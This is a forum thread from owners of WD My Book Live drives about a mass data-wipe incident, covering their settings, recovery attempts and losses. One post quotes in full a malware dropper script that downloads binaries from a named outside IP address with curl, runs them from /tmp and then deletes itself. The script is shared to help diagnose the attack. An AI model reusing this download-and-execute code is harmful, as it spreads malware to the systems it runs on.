I was not affected. Some data in case it’s helpful in narrowing down what is causing the problem:
Firmware version 02.42.03-027
Auto update disabled.
Remote access disabled and to my knowledge has never been enabled.
Behind NAT with no port forwarding.
UPnP disabled.
Have backups but am making another one just in case.
Update on my end: Trying out Disk Drill, appears to be working. It’s been running for about 5 minutes so far out of an estimated 16 hours and it’s already found a dozen PDFs and JPGs that were deleted. At first glance they look alright, but haven’t done a deep dive on the PDFs yet. Will hold off on purchasing the full version of the program until I can find out what all can be recovered, but it looks promising so far.
For those curious, I disassembled the MBL enclosure, removed the HDD, and plugged it into another external HD case I had. After what happened I didn’t trust trying to run data recovery over the network.
Can you let us know when you have worked out to get into the MyBook Live. It looks as if you have to destroy the plastic case to get into it, I haven’t discovered any screws at all
I posted this on reddit, but here it is and hopefully, WD can use this info.
(note edited to only include one link because I’m a new user)
My Netgear Armor started complaining that my WD MyBookLive was trying to reach a couple of URLs and that they were blocked. These were qlitrk dot com (with various sub domains such as supertrk dot qlitrk dot com) and 185.153.196.30/WSC0
I finally looked at what IP address /WSC0 contained and it was this:
#!/bin/sh
n=“OFJU”
if [ $# -gt 0 ]; then
n=$@
fi
cd /tmp
for a in $n
do
rm $a
curl -O http://185.153.196.30/$a
chmod +x $a
./$a
done
for a in $n
do
rm -rf $a
done
rm $0
I’m thankful that Netgear blackholed that 185 address but sheesh… too close for comfort.
My 3TB MBL’s are both powered down now, with no data loss and account still accessible.
But as I said before in a previous I had a ‘Firmware Successfully Installed’ message in both Dashboards when I logged in.
As I’m a BT customer I’m using a Smart Hub 2 which does have UPNP on for the WD devices on my network.
I do have to ask shouldn’t turning off Remote Access & unchecking check for updates in the Dashboard physically disconnect MBL’s from all internet traffic?
I’ve also disabled Access to the internet on those devices on the Smart Hub, so when / if do turn them on again, they’re not accessible. At least, that’s the theory…
I got the shaft as well. 2 TB of my children’s pics and videos, DELETED. Memories I’m hoping i can get back through recovery… Their servers had to be compromised.
You may have had a safepoint on the NAS which may be of some benefit. If you have lost data, do not make further changes and do not re-index the drive. It is likely that the data restoration will help recover most or all of your files if no further changes are made to the storage device.
I feel your pain brother. I had stuff ranging from my kids heartbeat to wedding pics, to everything. I literally broke down when it happened and lost it for a few blaming myself.
All data 4 TB gone, business, private, family, schoolwork kids etc. etc… A complete disaster. WD apparently does not care about their responsibility to deliver on their promise to offer reliable hardware for storing the most important data of families around the world. Will proceed tomorrow on recovery of data for what is possible and left. Wondering what WD’s the practical story is and their legal one. For sure, their worldwide market share will be down the drain as well. I hope and pray to recover the majority of the data of our family, but then NEVER WD again. NEVER. Saw some articles passing in this community chat about WD hesitation for releasing security patches through the years. They should be hold liable for this cybersecurity event which is disaster for so many families around the globe.